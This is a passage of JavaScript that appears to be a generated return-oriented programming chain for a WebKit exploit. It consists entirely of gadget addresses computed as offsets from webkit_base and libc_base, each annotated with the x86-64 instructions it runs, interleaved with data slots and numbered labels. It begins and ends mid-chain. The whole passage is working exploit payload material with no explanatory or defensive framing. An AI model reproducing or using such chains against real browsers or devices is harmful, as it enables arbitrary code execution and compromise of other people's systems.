webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+458296, //L9823 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+458312, //L9824 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9823: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9824: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9825: db([8, 0]); // 0x8 set_gadget(libc_base+759608,); //pop rax //L9826: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+458400, //L9827 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9827: db([0, 0]); // 0x0 
set_gadget(libc_base+764760,); //pop rsi //L9829: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+458520, //L9830 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+458536, //L9832 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9830: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9832: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+458712, //L9835 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+458728, //L9836 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+458680, //L9833 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+458696, //L9834 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9833: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9834: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9835: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9836: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+458808, //L9837 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+458824, //L9838 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9837: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9838: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+458920, //L9840 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+458904, //L9839 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9839: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9840: db([0, 0]); // 0x0 //L9814: //L9750: set_gadgets([ libc_base+764760, //pop rsi ropchain+458968, //L9841 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9841: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9843: db([4294967228, 4294967295]); // -0x44 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L9845: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+459128, //L9848 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+459112, //L9846 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9846: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9848: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+459304, //L9851 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+459320, //L9852 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+459272, //L9849 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+459288, //L9850 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9849: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9850: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9851: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L9852: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+459416, //L9854 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+459400, //L9853 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9853: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9854: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+459496, //L9855 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9855: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9857: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+459616, //L9860 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+459600, //L9858 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9858: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9860: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+459792, //L9863 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+459808, //L9864 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+459760, //L9861 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+459776, //L9862 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9861: db([0, 0]); // 0x0 
set_gadget(webkit_base+3236123,); //pop r9 //L9862: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9863: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9864: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+459904, //L9866 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+459888, //L9865 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9865: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9866: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+459984, //L9867 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9867: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9869: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+460104, //L9872 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+460088, //L9870 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9870: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9872: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+460280, //L9875 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+460296, //L9876 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+460248, //L9873 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi 
ropchain+460264, //L9874 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9873: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9874: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9875: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9876: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+460392, //L9878 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+460376, //L9877 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9877: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9878: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+460472, //L9879 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9879: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9881: db([4294967252, 4294967295]); // -0x2c set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+460592, //L9884 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+460576, //L9882 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9882: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9884: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+460768, //L9887 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+460784, //L9888 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi 
ropchain+460736, //L9885 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+460752, //L9886 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9885: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9886: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9887: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9888: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+460944, //L9892 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+460912, //L9890 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+460928, //L9891 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9889: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L9890: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9891: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9892: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+461048, //L9894 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+461032, //L9893 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9893: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9894: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+461128, //L9895 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9895: db([0, 0]); // 0x0 
set_gadget(libc_base+764760,); //pop rsi //L9897: db([4294967228, 4294967295]); // -0x44 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+461248, //L9900 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+461232, //L9898 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9898: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9900: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+461424, //L9903 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+461440, //L9904 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+461392, //L9901 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+461408, //L9902 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9901: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9902: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9903: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9904: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+461520, //L9905 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+461536, //L9906 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9905: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9906: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+461632, //L9908 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, 
//pop rsi ropchain+461616, //L9907 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9907: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9908: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+461712, //L9909 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L9909: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9910: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9911: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+461856, //L9912 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+461888, //L9914 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+461872, //L9913 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9912: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9913: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9914: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+462000, //L9916 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L9915: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9916: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760 
//pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+462104, //L9917 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L9917: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9918: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9919: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+462232, //L9921 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+462216, //L9920 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9920: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9921: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+462312, //L9922 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9922: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9924: db([4294967228, 4294967295]); // -0x44 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+462432, //L9927 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+462416, //L9925 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9925: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9927: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+462608, //L9930 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi 
ropchain+462624, //L9931 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+462576, //L9928 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+462592, //L9929 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9928: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9929: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9930: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9931: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+462704, //L9932 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+462720, //L9933 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9932: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9933: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+462832, //L9934 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+462864, //L9936 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+462848, //L9935 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9934: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9935: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9936: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi 
ropchain+463040, //L9938 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+463056, //L9939 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+463024, //L9937 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L9937: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9938: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9939: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+463168, //L9941 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+463216, //L9944 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+463184, //L9942 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L9941: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9942: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9943: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9944: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+463328, //L9945+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+463320, //L9945 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L9945: db([0, 0]); // 0x0 set_gadgets([ ropchain+463344, //L9945+24 ropchain+463816, //L9940 libc_base+764760, //pop rsi ropchain+463384, //L9946 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9946: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi 
//L9948: db([4294967228, 4294967295]); // -0x44 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+463504, //L9951 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+463488, //L9949 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9949: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9951: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+463680, //L9954 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+463696, //L9955 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+463648, //L9952 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+463664, //L9953 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9952: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9953: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9954: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9955: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+463792, //L9958 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+463776, //L9957 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9957: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9958: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+464408, //L9956 //L9940: libc_base+759608 //pop rax ]); //L9959: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi 
libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+463904, //L9960 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9960: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9962: db([4294967228, 4294967295]); // -0x44 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+464024, //L9965 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+464008, //L9963 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9963: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9965: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+464200, //L9968 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+464216, //L9969 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+464168, //L9966 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+464184, //L9967 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9966: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9967: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9968: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9969: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+464328, //L9970 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+464360, //L9972 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+464344, //L9971 webkit_base+660161, 
